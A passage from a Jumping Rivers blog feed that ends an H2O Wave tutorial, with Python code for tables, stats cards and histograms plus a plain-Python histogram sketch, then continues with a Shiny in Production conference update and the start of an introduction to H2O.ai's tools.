&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Table of the Data&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; subtitle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;table&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;form_card(box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;box(&lt;span style="color:#a5d6ff"&gt;&amp;#39;top&amp;#39;&lt;/span&gt;, width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;49.5%&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; items &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [make_table(df)],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;### Making stats cards&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;make_stats_card_data&lt;/span&gt;(q:Q, column):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value_counts &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; column&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;value_counts()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; total &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value_counts&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;sum()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; value_counts[&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;], total
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_stats_card&lt;/span&gt;(q:Q, column, index):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value_count, total &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; make_stats_card_data(q, column)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; percentage &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; value_count&lt;span style="color:#ff7b72;font-weight:bold"&gt;/&lt;/span&gt;total
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;stat&amp;#39;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;str(index)] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tall_gauge_stat_card(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; box &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;box(&lt;span style="color:#a5d6ff"&gt;&amp;#39;top&amp;#39;&lt;/span&gt;, width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;11.75%&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Number of houses with &amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; column&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; value &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;={{intl one}}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; aux_value&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;={{intl perc style=&amp;#34;percent&amp;#34; minimum_fraction_digits=2 maximum_fraction_digits=2 }}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; progress &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; percentage,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; dict(one&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;int(value_count),perc&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;float(percentage)),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot_color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;$blue&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_multiple_stats_cards&lt;/span&gt;(q:Q, df, index):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; i &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; index:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; column_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;columns&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist()[i]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; column &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df[column_name]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_stats_card(q, column, i)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;### Making histograms&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;make_histogram_data&lt;/span&gt;(values):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; count, division &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; np&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;histogram(values)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; [(x, y) &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; x, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; zip(division&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist(), count&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist())]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_histogram&lt;/span&gt;(q:Q, values, variable_name, index):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;feat&amp;#39;&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;str(index)] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot_card(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; box &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;box(&lt;span style="color:#a5d6ff"&gt;&amp;#39;bottom&amp;#39;&lt;/span&gt;, width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;25%&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Histogram of &amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; variable_name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;data(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; fields&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[&lt;span style="color:#a5d6ff"&gt;&amp;#39;division&amp;#39;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#39;counts&amp;#39;&lt;/span&gt;],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rows&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;make_histogram_data(values),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; pack&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;plot([ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;mark(type&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;interval&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;=division&amp;#39;&lt;/span&gt;, y&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;=counts&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y_min&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x_title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;variable_name, y_title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Count&amp;#39;&lt;/span&gt;)]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_histograms&lt;/span&gt;(q:Q, df, index):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;section2&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;section_card(box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;section2&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Plot of the data&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; subtitle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; i &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; index:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; column_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;columns&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist()[i]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df[column_name]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_histogram(q, values, column_name, i)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="next-steps"&gt;Next steps&lt;/h2&gt;
&lt;p&gt;Now that we&amp;rsquo;ve made our app, why not go ahead and try adding other widgets to it, or maybe change the layout or colour scheme? Take a look at the Wave documentation to see what else you could add! There are examples of how to use most &lt;a href="https://wave.h2o.ai/docs/widgets/overview" rel="external"&gt;widgets&lt;/a&gt;, and &lt;a href="https://wave.h2o.ai/docs/guide" rel="external"&gt;step-by-step guides&lt;/a&gt; that talk through topics such as page layouts, uploading files and writing tests.&lt;/p&gt;
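&lt;p&gt;If you do start tweaking the histograms, it helps to know what the plot cards are being fed. In the app, &lt;code&gt;make_histogram_data()&lt;/code&gt; calls &lt;code&gt;np.histogram()&lt;/code&gt;, which returns one more bin edge than it does counts, so &lt;code&gt;zip()&lt;/code&gt; pairs each count with the left-hand edge of its bin and drops the final edge. The sketch below reproduces that idea in plain Python so you can experiment without NumPy or Wave. Note that &lt;code&gt;histogram_rows&lt;/code&gt; and its &lt;code&gt;bins&lt;/code&gt; argument are names made up for this illustration, not part of either library, and edge cases (such as a column where every value is identical) are handled more simply here than in NumPy.&lt;/p&gt;

```python
def histogram_rows(values, bins=10):
    """Return (left_edge, count) pairs for equal-width bins.

    Illustrative helper only: a rough stand-in for zipping the
    output of np.histogram, not a drop-in replacement.
    """
    values = [float(v) for v in values]
    if not values:
        return []

    low, high = min(values), max(values)
    if low == high:
        # Assumption for this sketch: constant data goes in a single bin.
        return [(low, len(values))]

    width = (high - low) / bins
    counts = [0] * bins
    for v in values:
        # The last bin is closed on the right, so the maximum lands in it.
        i = min(int((v - low) / width), bins - 1)
        counts[i] += 1

    # Keep only the left-hand edge of each bin, one per count.
    edges = [low + i * width for i in range(bins)]
    return list(zip(edges, counts))


rows = histogram_rows([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], bins=5)
print(rows)  # [(0.0, 2), (2.0, 2), (4.0, 2), (6.0, 2), (8.0, 3)]
```

&lt;p&gt;Each tuple has the same shape as the rows passed to the &lt;code&gt;division&lt;/code&gt; and &lt;code&gt;counts&lt;/code&gt; fields in &lt;code&gt;show_histogram()&lt;/code&gt;, so changing the number of bins is one easy thing to try first.&lt;/p&gt;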
&lt;p&gt;H2O also have a &lt;a href="https://github.com/h2oai/wave-apps" rel="external"&gt;GitHub&lt;/a&gt; repository of Wave applications that they have made, which you could try using and editing for your own use. If those aren&amp;rsquo;t enough links for you to look at, the Wave website also has a &lt;a href="https://wave.h2o.ai/blog" rel="external"&gt;blog section&lt;/a&gt; where they announce any updates and share other useful information.&lt;/p&gt;
&lt;p&gt;Finally, I always find it helpful to look through a few different examples of how to code something when I&amp;rsquo;m learning a new skill, so why not take a look at &lt;a href="https://www.youtube.com/watch?v=alYWqXv8Sdg" rel="external"&gt;this video tutorial&lt;/a&gt; made by H2O? The tutorial shows you how to create a simple app for displaying data, a bit like the one we have just gone through (but they make the app more interactive). Note that the tutorial was created in 2021, so it uses an older version of H2O Wave. It still works with the latest version (0.20 at the time of writing); the only difference is how you run the app. In versions below 0.20 we needed to start a Wave server manually, but now you can simply run your app with &lt;code&gt;wave run &amp;lt;code_script&amp;gt;&lt;/code&gt; and the Wave server is started automatically.&lt;/p&gt;
&lt;p&gt;Jumping Rivers are now an H2O.ai partner, so if you want any further information please feel free to &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;contact us&lt;/a&gt;. You can also check out our courses on &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;H2O Wave and H2O Driverless AI&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I hope you found this tutorial helpful. Have fun making your next H2O Wave app!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/displaying-data-with-h2o-wave/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production Update</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-update/</link><pubDate>Tue, 14 Jun 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-update/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-update/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-update/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h3 id="registration-is-now-open"&gt;&lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Registration is now open!&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Organisation is now well under way for &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production&lt;/a&gt; on 6th-7th October! Our events team here at Jumping Rivers have been hard at work to make sure the conference is everything it promises to be.&lt;/p&gt;
&lt;p&gt;There have been a few updates over the last month or so, so we thought it was about time for another blog post to keep you all informed!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-shiny-in-production-update"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;img src="robot_shiny.png" title="Shiny Robot" alt="Jumping Rivers robot holding a spanner" style="display: block; width: 200px; margin-right: auto; margin-left: auto;" /&gt;
&lt;h4 id="speakers"&gt;Speakers&lt;/h4&gt;
&lt;p&gt;We now have a list of speakers up on the website. We&amp;rsquo;re excited to welcome these industry experts to Newcastle, and hear their take on all things Shiny in Production.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://twitter.com/ChrisBeeley" rel="external"&gt;Chris Beeley&lt;/a&gt; - NHS&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/c__constantine" rel="external"&gt;Caterina Constantinescu&lt;/a&gt; - Vuzo&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/nic_crane" rel="external"&gt;Nic Crane&lt;/a&gt; - Voltron Data&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/_colinfay" rel="external"&gt;Colin Fay&lt;/a&gt; - ThinkR&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/a_c_patt" rel="external"&gt;Andrew Patterson&lt;/a&gt; - Jumping Rivers&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/sellorm" rel="external"&gt;Mark Sellors&lt;/a&gt; - RStudio/Data Orchard&lt;/li&gt;
&lt;li&gt;&lt;a href="https://twitter.com/MikeKSmith" rel="external"&gt;Mike Smith&lt;/a&gt; - Pfizer&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Plus more to be announced!&lt;/p&gt;
&lt;h4 id="workshops"&gt;Workshops&lt;/h4&gt;
&lt;p&gt;The workshops for the afternoon of the first day are now confirmed. Our Jumping Rivers trainers are super excited to present three afternoon-long workshops on RStudio Connect, Tableau and Dashboards in R Markdown! When registering, make sure to select the ticket for the workshop you&amp;rsquo;re interested in!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Introduction to RStudio Connect&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;RStudio Connect is a hosting platform which makes publishing your Shiny applications, plumber APIs, R Markdown documents and many other content types painless and easy. In this workshop we will demonstrate a few different workflows which allow you to host, share and scale content on RStudio Connect.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Introduction to Tableau&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Faster than Excel and more capable of handling large datasets, Tableau is quickly becoming a valuable tool for individuals and organisations who want to leverage their data. It’s more user-friendly and simpler to learn than programming languages, but still allows a high level of customisation. This workshop is designed for people with no prior experience of Tableau who want to get to grips with the basics of summarising and interactively visualising their data.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Dashboards with R Markdown&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;R Markdown is an easy-to-use tool that allows you to dynamically create static or interactive documents and automatically update reports when data changes. Whether you are hoping to generate HTML, PDF or Microsoft Word documents, or even slides for a presentation, R Markdown caters to your needs. This workshop will demonstrate how to make simple flexdashboards in R Markdown.&lt;/p&gt;
&lt;h4 id="registration"&gt;Registration&lt;/h4&gt;
&lt;p&gt;Registration is now open! Early bird tickets are available until July 31st! To make the most of this 20% discount, head over to our &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We can&amp;rsquo;t wait to welcome you to Newcastle on 6th-7th October 2022!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-update/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>An introduction to H2O.ai</title><link>https://www.jumpingrivers.com/blog/introduction-to-h2o/</link><pubDate>Thu, 09 Jun 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/introduction-to-h2o/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/introduction-to-h2o/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/introduction-to-h2o/h2oaiLogo.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;If you came here looking for an introduction to water, or a synopsis of the 2006 TV series about teenage mermaids, you have sadly come to the wrong place. The H2O that we will talk about is H2O.ai, a company which develops products for easy, scalable machine learning and artificial intelligence.&lt;/p&gt;
&lt;h2 id="introduction"&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Machine learning and artificial intelligence (or AI for short) are topics which have had a lot of interest over the past 4-5 years. Some of this interest has come from businesses as they begin to utilise the information they collect on a day-to-day basis to streamline/automate processes or gain insight. A lot of companies are now looking to hire data scientists/engineers and in turn this is making a lot more people interested in machine learning and AI.&lt;/p&gt;
&lt;p&gt;&lt;img alt="Logos of various different machine learning and AI tools" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/introduction-to-h2o/logos.png" width="466"&gt;&lt;/p&gt;
&lt;p&gt;Now, as you look at upskilling in machine learning and AI, you might start by reading some books, taking some online courses and, if you are anything like me, going through many, many, many online tutorials and blog posts on different techniques. It’s at this point you will probably start to realise there are a lot of tools out there that you can use for your machine learning or AI problems. Deciding which tool is best for the job at hand can be very difficult. Hopefully, after reading this blog you will have a better idea of H2O.ai’s products and if they are what you have been looking for.&lt;/p&gt;
&lt;h2 id="who-are-h2oai"&gt;Who are H2O.ai?&lt;/h2&gt;
&lt;p&gt;H2O.ai are a company which say they are the visionary leaders in making AI accessible for everyone. Currently, they are the AI partner for over twenty thousand organisations including over half of the companies listed on the &lt;a href="https://fortune.com/fortune500/" rel="external"&gt;Fortune 500&lt;/a&gt; and are used by over one million data scientists around the world. They also employ twenty of the world’s Kaggle Grandmasters (of which, at the time of writing, there are 262), which shows the talent they have working there.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-introduction-to-h2o"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="current-products"&gt;Current products&lt;/h2&gt;
&lt;p&gt;H2O.ai are an open-source company that supply both free and proprietary tools. As H2O.ai state that they are democratising machine learning and AI, they have a range of tools to aid everyone with their machine learning projects from idea to production, no matter their level of expertise. Below, you can read a short overview of the different tools that they provide.&lt;/p&gt;
&lt;h3 id="open-source-tools"&gt;Open source tools&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.h2o.ai/products/h2o/" rel="external"&gt;H2O/H2O-3&lt;/a&gt;: H2O is a fully open source, distributed in-memory machine learning platform which is available in Python, R and various other languages. This is the main free offering from H2O.ai for undertaking machine learning tasks. H2O offers various different supervised and unsupervised algorithms, as well as some other useful tools such as Word2vec. You can look at a full list of the different algorithms on offer &lt;a href="https://docs.h2o.ai/h2o/latest-stable/h2o-docs/data-science.html" rel="external"&gt;here&lt;/a&gt;. H2O also offers a tool called AutoML for automatic machine learning. This allows you to easily try out the different algorithms H2O offers and output a leaderboard showing which model has performed the best with your data. If you want to learn more about AutoML, look at this &lt;a href="https://www.h2o.ai/blog/a-deep-dive-into-h2os-automl/" rel="external"&gt;blog post&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
